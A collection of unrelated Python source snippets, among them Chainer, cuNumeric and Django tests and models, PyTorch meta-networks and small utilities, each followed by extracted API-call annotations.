# ChainerX tests
+ [
{'use_chainerx': True, 'chainerx_device': 'native:0'},
{'use_chainerx': True, 'chainerx_device': 'cuda:0'},
{'use_chainerx': True, 'chainerx_device': 'cuda:1'},
]
)
class TestLayerNormalization(testing.FunctionTestCase):
def setUp(self):
self.check_forward_options = {'atol': 1e-4, 'rtol': 1e-3}
self.check_backward_options = {'atol': 1e-3, 'rtol': 1e-2}
self.check_double_backward_options = {'atol': 1e-3, 'rtol': 1e-2}
if self.dtype == numpy.float16:
self.check_forward_options = {'atol': 1e-3, 'rtol': 1e-2}
self.check_backward_options = {'atol': 1e-3, 'rtol': 1e-2}
self.check_double_backward_options = {'atol': 1e-3, 'rtol': 1e-2}
def generate_inputs(self):
shape = self.batchsize, self.size
size = numpy.prod(shape) // shape[0]
x = numpy.random.uniform(-1, 1, shape).astype(self.dtype)
gamma = numpy.random.uniform(-1, 1, size).astype(self.dtype)
beta = numpy.random.uniform(-1, 1, size).astype(self.dtype)
return x, gamma, beta
def forward_expected(self, inputs):
x, gamma, beta = inputs
mean = numpy.mean(x, axis=1, keepdims=True)
var = numpy.mean(numpy.square(x - mean), axis=1, keepdims=True)
std = numpy.sqrt(var + self.eps)
y_expected = (
numpy.expand_dims(gamma, axis=0) * (x - mean) / std
+ numpy.expand_dims(beta, axis=0))
return y_expected,
def forward(self, inputs, device):
x, gamma, beta = inputs
y = functions.layer_normalization(x, gamma, beta, eps=self.eps)
return y,
testing.run_module(__name__, __file__)
| [
"numpy.mean",
"numpy.prod",
"numpy.sqrt",
"chainer.functions.layer_normalization",
"chainer.testing.run_module",
"numpy.square",
"chainer.testing.product",
"numpy.expand_dims",
"numpy.random.uniform"
] | [((2133, 2171), 'chainer.testing.run_module', 'testing.run_module', (['__name__', '__file__'], {}), '(__name__, __file__)\n', (2151, 2171), False, 'from chainer import testing\n'), ((1658, 1694), 'numpy.mean', 'numpy.mean', (['x'], {'axis': '(1)', 'keepdims': '(True)'}), '(x, axis=1, keepdims=True)\n', (1668, 1694), False, 'import numpy\n'), ((1781, 1807), 'numpy.sqrt', 'numpy.sqrt', (['(var + self.eps)'], {}), '(var + self.eps)\n', (1791, 1807), False, 'import numpy\n'), ((2053, 2112), 'chainer.functions.layer_normalization', 'functions.layer_normalization', (['x', 'gamma', 'beta'], {'eps': 'self.eps'}), '(x, gamma, beta, eps=self.eps)\n', (2082, 2112), False, 'from chainer import functions\n'), ((98, 206), 'chainer.testing.product', 'testing.product', (["{'batchsize': [1, 5], 'size': [10, 20], 'dtype': [numpy.float32], 'eps': [\n 1e-05, 0.1]}"], {}), "({'batchsize': [1, 5], 'size': [10, 20], 'dtype': [numpy.\n float32], 'eps': [1e-05, 0.1]})\n", (113, 206), False, 'from chainer import testing\n'), ((1307, 1324), 'numpy.prod', 'numpy.prod', (['shape'], {}), '(shape)\n', (1317, 1324), False, 'import numpy\n'), ((1720, 1742), 'numpy.square', 'numpy.square', (['(x - mean)'], {}), '(x - mean)\n', (1732, 1742), False, 'import numpy\n'), ((1909, 1940), 'numpy.expand_dims', 'numpy.expand_dims', (['beta'], {'axis': '(0)'}), '(beta, axis=0)\n', (1926, 1940), False, 'import numpy\n'), ((326, 424), 'chainer.testing.product', 'testing.product', (["{'use_cuda': [True], 'use_cudnn': ['never', 'always'], 'cuda_device': [0, 1]}"], {}), "({'use_cuda': [True], 'use_cudnn': ['never', 'always'],\n 'cuda_device': [0, 1]})\n", (341, 424), False, 'from chainer import testing\n'), ((1349, 1383), 'numpy.random.uniform', 'numpy.random.uniform', (['(-1)', '(1)', 'shape'], {}), '(-1, 1, shape)\n', (1369, 1383), False, 'import numpy\n'), ((1419, 1452), 'numpy.random.uniform', 'numpy.random.uniform', (['(-1)', '(1)', 'size'], {}), '(-1, 1, size)\n', (1439, 1452), False, 'import numpy\n'), ((1487, 1520), 'numpy.random.uniform', 'numpy.random.uniform', (['(-1)', '(1)', 'size'], {}), '(-1, 1, size)\n', (1507, 1520), False, 'import numpy\n'), ((1843, 1875), 'numpy.expand_dims', 'numpy.expand_dims', (['gamma'], {'axis': '(0)'}), '(gamma, axis=0)\n', (1860, 1875), False, 'import numpy\n')] |
import matse_stundenplan
matse_stundenplan.run() | [
"matse_stundenplan.run"
] | [((26, 49), 'matse_stundenplan.run', 'matse_stundenplan.run', ([], {}), '()\n', (47, 49), False, 'import matse_stundenplan\n')] |
import subprocess
import tempfile
import unittest
COMMON_SUBPROCESS_ARGS = {
'timeout': 5,
'stdout': subprocess.PIPE,
'universal_newlines': True
}
class TestCommandLineInterface(unittest.TestCase):
def test_simple_invocation(self):
"""Test simple execution: read from stdin, write to stdout"""
process = subprocess.run(
['python3', '-m', 'hasami.cli'],
**COMMON_SUBPROCESS_ARGS,
input='これは単純な文です。\nこれが最初の文です。これは二番目の文です。これが最後の文です。',
)
self.assertEqual(0, process.returncode)
self.assertEqual('これは単純な文です。\nこれが最初の文です。\nこれは二番目の文です。\nこれが最後の文です。\n', process.stdout)
def test_reading_from_file(self):
"""Test reading input from file"""
with tempfile.NamedTemporaryFile() as file:
file.write('これは単純な文です。\nこれが最初の文です。これは二番目の文です。これが最後の文です。'.encode('utf-8'))
file.flush()
process = subprocess.run(
['python3', '-m', 'hasami.cli', file.name],
**COMMON_SUBPROCESS_ARGS,
)
self.assertEqual(0, process.returncode)
self.assertEqual('これは単純な文です。\nこれが最初の文です。\nこれは二番目の文です。\nこれが最後の文です。\n', process.stdout)
| [
"subprocess.run",
"tempfile.NamedTemporaryFile"
] | [((340, 473), 'subprocess.run', 'subprocess.run', (["['python3', '-m', 'hasami.cli']"], {'input': '"""これは単純な文です。\nこれが最初の文です。これは二番目の文です。これが最後の文です。"""'}), '([\'python3\', \'-m\', \'hasami.cli\'], **COMMON_SUBPROCESS_ARGS,\n input="""これは単純な文です。\nこれが最初の文です。これは二番目の文です。これが最後の文です。""")\n', (354, 473), False, 'import subprocess\n'), ((752, 781), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {}), '()\n', (779, 781), False, 'import tempfile\n'), ((925, 1014), 'subprocess.run', 'subprocess.run', (["['python3', '-m', 'hasami.cli', file.name]"], {}), "(['python3', '-m', 'hasami.cli', file.name], **\n COMMON_SUBPROCESS_ARGS)\n", (939, 1014), False, 'import subprocess\n')] |
import random
from vindinium.bots import RawBot
__all__ = ['RandomBot']
class RandomBot(RawBot):
'''Random bot.'''
def move(self):
return random.choice(['Stay', 'North', 'West', 'East', 'South']) | [
"random.choice"
] | [((161, 218), 'random.choice', 'random.choice', (["['Stay', 'North', 'West', 'East', 'South']"], {}), "(['Stay', 'North', 'West', 'East', 'South'])\n", (174, 218), False, 'import random\n')] |
import numpy as np
import pandas as pd
array = [1,3,4,7,8,10,15]
np_array = np.array(array)
print("Arranjo NumPy")
print(np_array)
print("Convertendo para serie Pandas")
ds_array = pd.Series(np_array)
print("Serie Pandas")
print(ds_array) | [
"pandas.Series",
"numpy.array"
] | [((78, 93), 'numpy.array', 'np.array', (['array'], {}), '(array)\n', (86, 93), True, 'import numpy as np\n'), ((186, 205), 'pandas.Series', 'pd.Series', (['np_array'], {}), '(np_array)\n', (195, 205), True, 'import pandas as pd\n')] |
from rich.console import Console
from rich.table import Table
def print_table(gss: tuple, fib: tuple) -> None:
console = Console()
table = Table(title='Find Function Extremum')
table.add_column('Method name', justify='right', style='cyan', no_wrap=True)
table.add_column('function in Xm value', style='magenta')
table.add_column('Xm dot value', style='red')
table.add_column('Counted iterations number', style='green')
table.add_row('Golden-Section Method', *list(map(str, gss)))
table.add_row('Fibonacci Method', *list(map(str, fib)))
console.print(table)
| [
"rich.console.Console",
"rich.table.Table"
] | [((127, 136), 'rich.console.Console', 'Console', ([], {}), '()\n', (134, 136), False, 'from rich.console import Console\n'), ((149, 186), 'rich.table.Table', 'Table', ([], {'title': '"""Find Function Extremum"""'}), "(title='Find Function Extremum')\n", (154, 186), False, 'from rich.table import Table\n')] |
# time_count.py
from webpie import WPApp, WPHandler
import time
class Handler(WPHandler):
def time(self, request, relpath):
return "[%d]: %s\n" % (self.App.bump_counter(), time.ctime()), "text/plain"
class App(WPApp):
def __init__(self, handler_class):
WPApp.__init__(self, handler_class)
self.Counter = 0
def bump_counter(self):
self.Counter += 1
return self.Counter
App(Handler).run_server(8080)
| [
"time.ctime",
"webpie.WPApp.__init__"
] | [((343, 378), 'webpie.WPApp.__init__', 'WPApp.__init__', (['self', 'handler_class'], {}), '(self, handler_class)\n', (357, 378), False, 'from webpie import WPApp, WPHandler\n'), ((248, 260), 'time.ctime', 'time.ctime', ([], {}), '()\n', (258, 260), False, 'import time\n')] |
from warehouse_item import warehouse_item
import csv
import datetime
log_file_path = "YOUR_FILE_PATH_HERE"
storage_file_path = "YOUR_FILE_PATH_HERE"
def reg_new_item(name, description, qr_code_id):
date_registered = ""
time_registered = ""
if item_already_exists(qr_code_id):
print("Can't register new item. Item with QR code already exist.", qr_code_id)
else:
item = warehouse_item(name, description, datetime.date.today(), datetime.datetime.now(), qr_code_id)
csv_row = item.attributes_to_csv()
with open(storage_file_path, mode='a') as storage_file:
storage_writer = csv.writer(storage_file, delimiter=";", quotechar="'", quoting=csv.QUOTE_MINIMAL)
storage_writer.writerow([csv_row])
def item_already_exists(scanned_qr_code):
with open(storage_file_path, mode='r') as warehouse_file:
csv_reader = csv.reader(warehouse_file, delimiter=',')
line_count = 0
for row in csv_reader:
# print(row)
if str(scanned_qr_code) == row[4]:
line_count += 1
# print("Found duplicate QR ID")
return True
else:
line_count += 1
# print("Processed lines: ", line_count)
return False
def extract_item():
# Skriv til utleie_logg
pass
def return_item():
pass
| [
"datetime.datetime.now",
"datetime.date.today",
"csv.writer",
"csv.reader"
] | [((893, 934), 'csv.reader', 'csv.reader', (['warehouse_file'], {'delimiter': '""","""'}), "(warehouse_file, delimiter=',')\n", (903, 934), False, 'import csv\n'), ((440, 461), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (459, 461), False, 'import datetime\n'), ((463, 486), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (484, 486), False, 'import datetime\n'), ((637, 723), 'csv.writer', 'csv.writer', (['storage_file'], {'delimiter': '""";"""', 'quotechar': '"""\'"""', 'quoting': 'csv.QUOTE_MINIMAL'}), '(storage_file, delimiter=\';\', quotechar="\'", quoting=csv.\n QUOTE_MINIMAL)\n', (647, 723), False, 'import csv\n')] |
import math
import time
last = 10000
found = 1 # because we skip 2, the only even prime number
start = time.monotonic()
print('Prime numbers to {}'.format(last))
# print('2',end='')
def check(number):
prime = 1
f = 1.5
g = int(math.sqrt(number))+1
for divider in range(2, g):
f = number/divider
if f == int(f):
prime = 0
return(prime)
for number in range(3, last, 2):
if check(number) == 1:
# print(',', number,end='')
found += 1
end = time.monotonic()
print('Found {:} prime numbers'.format(found))
print('This took:', (end - start), 'seconds.')
| [
"time.monotonic",
"math.sqrt"
] | [((106, 122), 'time.monotonic', 'time.monotonic', ([], {}), '()\n', (120, 122), False, 'import time\n'), ((510, 526), 'time.monotonic', 'time.monotonic', ([], {}), '()\n', (524, 526), False, 'import time\n'), ((243, 260), 'math.sqrt', 'math.sqrt', (['number'], {}), '(number)\n', (252, 260), False, 'import math\n')] |
"""
Some meta networks
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
import math
from utils.quantize import Function_STE, Function_BWN
from utils.miscellaneous import progress_bar
from utils.quantize import quantized_CNN, quantized_Linear
import utils.global_var as gVar
meta_count = 0
class MetaLSTMFC(nn.Module):
def __init__(self, hidden_size = 20):
super(MetaLSTMFC, self).__init__()
self.hidden_size = hidden_size
self.lstm1 = nn.LSTM(input_size=1, hidden_size = hidden_size, num_layers=1)
self.fc1 = nn.Linear(in_features=hidden_size, out_features=1)
def forward(self, x, hidden = None):
if hidden is None:
x, (hn1, cn1) = self.lstm1(x)
else:
x, (hn1, cn1) = self.lstm1(x, (hidden[0], hidden[1]))
x = self.fc1(x.view(-1, self.hidden_size))
return x, (hn1, cn1)
class MetaMultiLSTMFC(nn.Module):
def __init__(self, hidden_size=20, num_lstm=2):
super(MetaMultiLSTMFC, self).__init__()
self.hidden_size = hidden_size
self.lstm1 = nn.LSTM(input_size=1, hidden_size=hidden_size, num_layers=num_lstm)
self.fc1 = nn.Linear(in_features=hidden_size, out_features=1)
def forward(self, x, hidden=None):
if hidden is None:
x, (hn1, cn1) = self.lstm1(x)
else:
x, (hn1, cn1) = self.lstm1(x, (hidden[0], hidden[1]))
x = self.fc1(x.view(-1, self.hidden_size))
return x, (hn1, cn1)
class MetaFC(nn.Module):
def __init__(self, hidden_size = 1500, symmetric_init=False, use_nonlinear=None):
super(MetaFC, self).__init__()
self.linear1 = nn.Linear(in_features=1, out_features=hidden_size, bias=False)
self.linear2 = nn.Linear(in_features=hidden_size, out_features=1, bias=False)
if symmetric_init:
self.linear1.weight.data.fill_(1.0 / hidden_size)
self.linear2.weight.data.fill_(1.0)
self.use_nonlinear = use_nonlinear
def forward(self, x):
x = self.linear1(x)
if self.use_nonlinear is 'relu':
x = F.relu(x)
elif self.use_nonlinear is 'tanh':
x = torch.tanh(x)
x = self.linear2(x)
return x
class MetaMultiFC(nn.Module):
def __init__(self, hidden_size = 10, use_nonlinear=None):
super(MetaMultiFC, self).__init__()
self.linear1 = nn.Linear(in_features=1, out_features=hidden_size, bias=False)
self.linear2 = nn.Linear(in_features=hidden_size, out_features=hidden_size, bias=False)
self.linear3 = nn.Linear(in_features=hidden_size, out_features=1, bias=False)
self.use_nonlinear = use_nonlinear
def forward(self, x):
x = self.linear1(x)
if self.use_nonlinear == 'relu':
x = F.relu(x)
elif self.use_nonlinear == 'tanh':
x = torch.tanh(x)
x = self.linear2(x)
if self.use_nonlinear == 'relu':
x = F.relu(x)
elif self.use_nonlinear == 'tanh':
x = torch.tanh(x)
x = self.linear3(x)
return x
class MetaDesignedMultiFC(nn.Module):
def __init__(self, hidden_size = 10, num_layers = 4, use_nonlinear='relu'):
super(MetaDesignedMultiFC, self).__init__()
self.use_nonlinear = use_nonlinear
self.network = nn.Sequential()
# self.linear = dict()
for layer_idx in range(num_layers):
in_features = 1 if layer_idx == 0 else hidden_size
out_features = 1 if layer_idx == (num_layers-1) else hidden_size
self.network.add_module('Linear%d' %layer_idx, nn.Linear(in_features=in_features, out_features=out_features, bias=False))
if layer_idx != (num_layers-1):
if self.use_nonlinear == 'relu':
self.network.add_module('ReLU%d' %layer_idx, nn.ReLU())
elif self.use_nonlinear == 'tanh':
self.network.add_module('Tanh%d' %layer_idx, nn.Tanh())
else:
# raise NotImplementedError
pass
def forward(self, x):
return self.network(x)
class MetaMultiFCBN(nn.Module):
def __init__(self, hidden_size = 10, use_nonlinear = None):
super(MetaMultiFCBN, self).__init__()
self.linear1 = nn.Linear(in_features=1, out_features=hidden_size, bias=False)
self.linear2 = nn.Linear(in_features=hidden_size, out_features=hidden_size, bias=False)
self.linear3 = nn.Linear(in_features=hidden_size, out_features=1, bias=False)
self.bn1 = nn.BatchNorm1d(num_features=hidden_size)
self.bn2 = nn.BatchNorm1d(num_features=hidden_size)
self.use_nonlinear = use_nonlinear
def forward(self, x):
x = self.linear1(x)
x = self.bn1(x)
if self.use_nonlinear == 'relu':
x = F.relu(x)
elif self.use_nonlinear == 'tanh':
x = torch.tanh(x)
x = self.linear2(x)
x = self.bn2(x)
if self.use_nonlinear == 'relu':
x = F.relu(x)
elif self.use_nonlinear == 'tanh':
x = torch.tanh(x)
x = self.linear3(x)
return x
class MetaSimple(nn.Module):
"""
A simple Meta model just multiplies a factor to the input gradient
"""
def __init__(self):
super(MetaSimple, self).__init__()
self.alpha = nn.Parameter(torch.ones([1]))
def forward(self, x):
return self.alpha * x
def update_parameters(net, lr):
for param in net.parameters():
param.data.add_(-lr * param.grad.data)
def test(net, quantized_type, test_loader, use_cuda = True):
net.eval()
correct = 0
total = 0
for batch_idx, (inputs, targets) in enumerate(test_loader):
if use_cuda:
inputs, targets = inputs.cuda(), targets.cuda()
outputs = net(inputs, quantized_type)
_, predicted = torch.max(outputs.data, dim=1)
correct += predicted.eq(targets.data).cpu().sum().item()
total += targets.size(0)
progress_bar(batch_idx, len(test_loader), "Test Acc: %.3f%%" % (100.0 * correct / total))
return 100.0 * correct / total
if __name__ == '__main__':
net = MetaDesignedMultiFC()
torch.save(
{
'model': net,
'hidden_size': 100,
'nonlinear': 'None'
}, './Results/meta_net.pkl'
)
meta_pack = torch.load('./Results/meta_net.pkl')
retrieve_net = meta_pack['model']
inputs = torch.rand([10, 1])
outputs = retrieve_net(inputs)
| [
"torch.tanh",
"torch.nn.ReLU",
"torch.nn.Tanh",
"torch.nn.LSTM",
"torch.nn.Sequential",
"torch.load",
"torch.max",
"torch.nn.BatchNorm1d",
"torch.save",
"torch.nn.Linear",
"torch.nn.functional.relu",
"torch.rand",
"torch.ones"
] | [((6281, 6378), 'torch.save', 'torch.save', (["{'model': net, 'hidden_size': 100, 'nonlinear': 'None'}", '"""./Results/meta_net.pkl"""'], {}), "({'model': net, 'hidden_size': 100, 'nonlinear': 'None'},\n './Results/meta_net.pkl')\n", (6291, 6378), False, 'import torch\n'), ((6452, 6488), 'torch.load', 'torch.load', (['"""./Results/meta_net.pkl"""'], {}), "('./Results/meta_net.pkl')\n", (6462, 6488), False, 'import torch\n'), ((6541, 6560), 'torch.rand', 'torch.rand', (['[10, 1]'], {}), '([10, 1])\n', (6551, 6560), False, 'import torch\n'), ((492, 552), 'torch.nn.LSTM', 'nn.LSTM', ([], {'input_size': '(1)', 'hidden_size': 'hidden_size', 'num_layers': '(1)'}), '(input_size=1, hidden_size=hidden_size, num_layers=1)\n', (499, 552), True, 'import torch.nn as nn\n'), ((574, 624), 'torch.nn.Linear', 'nn.Linear', ([], {'in_features': 'hidden_size', 'out_features': '(1)'}), '(in_features=hidden_size, out_features=1)\n', (583, 624), True, 'import torch.nn as nn\n'), ((1098, 1165), 'torch.nn.LSTM', 'nn.LSTM', ([], {'input_size': '(1)', 'hidden_size': 'hidden_size', 'num_layers': 'num_lstm'}), '(input_size=1, hidden_size=hidden_size, num_layers=num_lstm)\n', (1105, 1165), True, 'import torch.nn as nn\n'), ((1185, 1235), 'torch.nn.Linear', 'nn.Linear', ([], {'in_features': 'hidden_size', 'out_features': '(1)'}), '(in_features=hidden_size, out_features=1)\n', (1194, 1235), True, 'import torch.nn as nn\n'), ((1685, 1747), 'torch.nn.Linear', 'nn.Linear', ([], {'in_features': '(1)', 'out_features': 'hidden_size', 'bias': '(False)'}), '(in_features=1, out_features=hidden_size, bias=False)\n', (1694, 1747), True, 'import torch.nn as nn\n'), ((1771, 1833), 'torch.nn.Linear', 'nn.Linear', ([], {'in_features': 'hidden_size', 'out_features': '(1)', 'bias': '(False)'}), '(in_features=hidden_size, out_features=1, bias=False)\n', (1780, 1833), True, 'import torch.nn as nn\n'), ((2421, 2483), 'torch.nn.Linear', 'nn.Linear', ([], {'in_features': '(1)', 'out_features': 'hidden_size', 'bias': '(False)'}), '(in_features=1, out_features=hidden_size, bias=False)\n', (2430, 2483), True, 'import torch.nn as nn\n'), ((2507, 2579), 'torch.nn.Linear', 'nn.Linear', ([], {'in_features': 'hidden_size', 'out_features': 'hidden_size', 'bias': '(False)'}), '(in_features=hidden_size, out_features=hidden_size, bias=False)\n', (2516, 2579), True, 'import torch.nn as nn\n'), ((2603, 2665), 'torch.nn.Linear', 'nn.Linear', ([], {'in_features': 'hidden_size', 'out_features': '(1)', 'bias': '(False)'}), '(in_features=hidden_size, out_features=1, bias=False)\n', (2612, 2665), True, 'import torch.nn as nn\n'), ((3360, 3375), 'torch.nn.Sequential', 'nn.Sequential', ([], {}), '()\n', (3373, 3375), True, 'import torch.nn as nn\n'), ((4347, 4409), 'torch.nn.Linear', 'nn.Linear', ([], {'in_features': '(1)', 'out_features': 'hidden_size', 'bias': '(False)'}), '(in_features=1, out_features=hidden_size, bias=False)\n', (4356, 4409), True, 'import torch.nn as nn\n'), ((4433, 4505), 'torch.nn.Linear', 'nn.Linear', ([], {'in_features': 'hidden_size', 'out_features': 'hidden_size', 'bias': '(False)'}), '(in_features=hidden_size, out_features=hidden_size, bias=False)\n', (4442, 4505), True, 'import torch.nn as nn\n'), ((4529, 4591), 'torch.nn.Linear', 'nn.Linear', ([], {'in_features': 'hidden_size', 'out_features': '(1)', 'bias': '(False)'}), '(in_features=hidden_size, out_features=1, bias=False)\n', (4538, 4591), True, 'import torch.nn as nn\n'), ((4612, 4652), 'torch.nn.BatchNorm1d', 'nn.BatchNorm1d', ([], {'num_features': 'hidden_size'}), '(num_features=hidden_size)\n', (4626, 4652), True, 'import torch.nn as nn\n'), ((4672, 4712), 'torch.nn.BatchNorm1d', 'nn.BatchNorm1d', ([], {'num_features': 'hidden_size'}), '(num_features=hidden_size)\n', (4686, 4712), True, 'import torch.nn as nn\n'), ((5951, 5981), 'torch.max', 'torch.max', (['outputs.data'], {'dim': '(1)'}), '(outputs.data, dim=1)\n', (5960, 5981), False, 'import torch\n'), ((2129, 2138), 'torch.nn.functional.relu', 'F.relu', (['x'], {}), '(x)\n', (2135, 2138), True, 'import torch.nn.functional as F\n'), ((2823, 2832), 'torch.nn.functional.relu', 'F.relu', (['x'], {}), '(x)\n', (2829, 2832), True, 'import torch.nn.functional as F\n'), ((2991, 3000), 'torch.nn.functional.relu', 'F.relu', (['x'], {}), '(x)\n', (2997, 3000), True, 'import torch.nn.functional as F\n'), ((4894, 4903), 'torch.nn.functional.relu', 'F.relu', (['x'], {}), '(x)\n', (4900, 4903), True, 'import torch.nn.functional as F\n'), ((5086, 5095), 'torch.nn.functional.relu', 'F.relu', (['x'], {}), '(x)\n', (5092, 5095), True, 'import torch.nn.functional as F\n'), ((5435, 5450), 'torch.ones', 'torch.ones', (['[1]'], {}), '([1])\n', (5445, 5450), False, 'import torch\n'), ((2198, 2211), 'torch.tanh', 'torch.tanh', (['x'], {}), '(x)\n', (2208, 2211), False, 'import torch\n'), ((2892, 2905), 'torch.tanh', 'torch.tanh', (['x'], {}), '(x)\n', (2902, 2905), False, 'import torch\n'), ((3060, 3073), 'torch.tanh', 'torch.tanh', (['x'], {}), '(x)\n', (3070, 3073), False, 'import torch\n'), ((3652, 3725), 'torch.nn.Linear', 'nn.Linear', ([], {'in_features': 'in_features', 'out_features': 'out_features', 'bias': '(False)'}), '(in_features=in_features, out_features=out_features, bias=False)\n', (3661, 3725), True, 'import torch.nn as nn\n'), ((4963, 4976), 'torch.tanh', 'torch.tanh', (['x'], {}), '(x)\n', (4973, 4976), False, 'import torch\n'), ((5155, 5168), 'torch.tanh', 'torch.tanh', (['x'], {}), '(x)\n', (5165, 5168), False, 'import torch\n'), ((3886, 3895), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (3893, 3895), True, 'import torch.nn as nn\n'), ((4013, 4022), 'torch.nn.Tanh', 'nn.Tanh', ([], {}), '()\n', (4020, 4022), True, 'import torch.nn as nn\n')] |
# Copyright 2022 NVIDIA Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import random
import numpy as np
import pytest
import cunumeric as cn
from legate.core import LEGATE_MAX_DIM
@pytest.mark.parametrize("ndim", range(0, LEGATE_MAX_DIM))
def test_indices(ndim):
dimensions = tuple(random.randint(2, 5) for i in range(ndim))
np_res = np.indices(dimensions)
cn_res = cn.indices(dimensions)
assert np.array_equal(np_res, cn_res)
np_res = np.indices(dimensions, dtype=float)
cn_res = cn.indices(dimensions, dtype=float)
assert np.array_equal(np_res, cn_res)
np_res = np.indices(dimensions, sparse=True)
cn_res = cn.indices(dimensions, sparse=True)
for i in range(len(np_res)):
assert np.array_equal(np_res[i], cn_res[i])
if __name__ == "__main__":
import sys
sys.exit(pytest.main(sys.argv))
| [
"cunumeric.indices",
"numpy.indices",
"pytest.main",
"numpy.array_equal",
"random.randint"
] | [((861, 883), 'numpy.indices', 'np.indices', (['dimensions'], {}), '(dimensions)\n', (871, 883), True, 'import numpy as np\n'), ((897, 919), 'cunumeric.indices', 'cn.indices', (['dimensions'], {}), '(dimensions)\n', (907, 919), True, 'import cunumeric as cn\n'), ((931, 961), 'numpy.array_equal', 'np.array_equal', (['np_res', 'cn_res'], {}), '(np_res, cn_res)\n', (945, 961), True, 'import numpy as np\n'), ((976, 1011), 'numpy.indices', 'np.indices', (['dimensions'], {'dtype': 'float'}), '(dimensions, dtype=float)\n', (986, 1011), True, 'import numpy as np\n'), ((1025, 1060), 'cunumeric.indices', 'cn.indices', (['dimensions'], {'dtype': 'float'}), '(dimensions, dtype=float)\n', (1035, 1060), True, 'import cunumeric as cn\n'), ((1072, 1102), 'numpy.array_equal', 'np.array_equal', (['np_res', 'cn_res'], {}), '(np_res, cn_res)\n', (1086, 1102), True, 'import numpy as np\n'), ((1117, 1152), 'numpy.indices', 'np.indices', (['dimensions'], {'sparse': '(True)'}), '(dimensions, sparse=True)\n', (1127, 1152), True, 'import numpy as np\n'), ((1166, 1201), 'cunumeric.indices', 'cn.indices', (['dimensions'], {'sparse': '(True)'}), '(dimensions, sparse=True)\n', (1176, 1201), True, 'import cunumeric as cn\n'), ((1250, 1286), 'numpy.array_equal', 'np.array_equal', (['np_res[i]', 'cn_res[i]'], {}), '(np_res[i], cn_res[i])\n', (1264, 1286), True, 'import numpy as np\n'), ((1345, 1366), 'pytest.main', 'pytest.main', (['sys.argv'], {}), '(sys.argv)\n', (1356, 1366), False, 'import pytest\n'), ((804, 824), 'random.randint', 'random.randint', (['(2)', '(5)'], {}), '(2, 5)\n', (818, 824), False, 'import random\n')] |
from django.db import models
from django.conf import settings
from django.utils.translation import gettext_lazy as _
from django.contrib.contenttypes.models import ContentType
from django.db.models.signals import post_save
from django.urls import reverse
from config.utils import notify_slack
from random import random
class ActiveManager(models.Manager):
def get_queryset(self):
return super().get_queryset().filter(is_active=True)
class Treatment(models.Model):
name = models.SlugField(unique=True)
label = models.CharField(max_length=50)
is_active = models.BooleanField(default=True)
target_assignment_ratio = models.FloatField(default=0)
objects = models.Manager()
active_treatments = ActiveManager()
def __str__(self):
return self.label
class Meta:
ordering = ('name',)
class Assignment(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
group = models.CharField(max_length=10, blank=True, null=True)
treatment = models.ForeignKey(Treatment, on_delete=models.CASCADE)
assigned_date = models.DateTimeField(auto_now_add=True)
GROUPS = ('autonomy', 'control', )
NUM_GROUPS = len(GROUPS)
__treatment_id = None
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.__treatment_id = self.treatment_id
def __str__(self):
return '%s - %s/%s' % (self.user, self.treatment.name, self.group)
def save(self, *args, **kwargs):
if self.treatment_id != self.__treatment_id:
# Force creation of new item
self.pk = None
super().save(*args, **kwargs)
def notify_assignment(sender, instance, created, **kwargs):
from .treatments import assignment_stats
if not created:
return
content_type = ContentType.objects.get_for_model(instance.__class__)
url = reverse("admin:%s_%s_change" % (content_type.app_label, content_type.model), args=(instance.pk,))
stats = assignment_stats()
stats_text = ', '.join(['%s/%s N=%d (%d%%)' % (s['name'], s['assignment__group'], s['count'], 100*s['ratio']) for s in stats if s['count'] > 0])
notify_slack('*New assignment!* %s \n Stats: %s \n' % (instance, stats_text), url)
post_save.connect(notify_assignment, sender=Assignment)
class ClassificationResult(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
completed_date = models.DateField(auto_now_add=True)
score_autonomy = models.IntegerField()
score_impersonal = models.IntegerField()
score_control = models.IntegerField()
score_amotivation = models.IntegerField()
calculated_group = models.CharField(max_length=10, blank=True, null=True)
age = models.CharField(max_length=10)
sex = models.CharField(max_length=10)
occupation = models.CharField(max_length=10)
class Meta:
ordering = ('-id',)
def calculate_group(self):
"Calculate group based on Inference Tree computed from Mturk data"
prob_autonomy = 0
if self.score_amotivation <= 3: # 2 on 5-scale likert -> 3 on 7-scale likert
if self.score_impersonal <= 3:
if self.score_control <= 2:
prob_autonomy = 1.0 # Autonomy with 0% error
else:
if self.score_autonomy <= 5:
prob_autonomy = 0.5 # Control with 50% error
else:
prob_autonomy = 0.9 # Autonomy with 10% error
else:
prob_autonomy = 0.41 # Control with 41% error
else:
prob_autonomy = 0.09 # Control with 9% error
if random() < prob_autonomy:
return 'autonomy'
return 'control'
def save(self, *args, **kwargs):
# Calculate group
if not self.calculated_group:
self.calculated_group = self.calculate_group()
super().save(*args, **kwargs)
class GcosResult(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
completed_date = models.DateField(auto_now_add=True)
score_autonomy = models.IntegerField()
score_control = models.IntegerField()
score_impersonal = models.IntegerField()
score_order = models.CharField(max_length=3)
@property
def scores(self):
return {
'A': self.score_autonomy,
'C': self.score_control,
'I': self.score_impersonal
}
def _calculate_score_order(self):
scores_sorted = sorted(self.scores.items(), key=lambda item: item[1])[::-1]
return ''.join([item[0] for item in test_scores_sorted])
def save(self, *args, **kwargs):
self.score_order = self._calculate_score_order()
super().save(*args, **kwargs)
def __str__(self):
return 'A %d, C %d, I %d' % (self.score_autonomy, self.score_control, self.score_impersonal) | [
"django.db.models.FloatField",
"django.db.models.Manager",
"django.contrib.contenttypes.models.ContentType.objects.get_for_model",
"django.db.models.DateField",
"django.db.models.ForeignKey",
"django.db.models.IntegerField",
"django.db.models.signals.post_save.connect",
"config.utils.notify_slack",
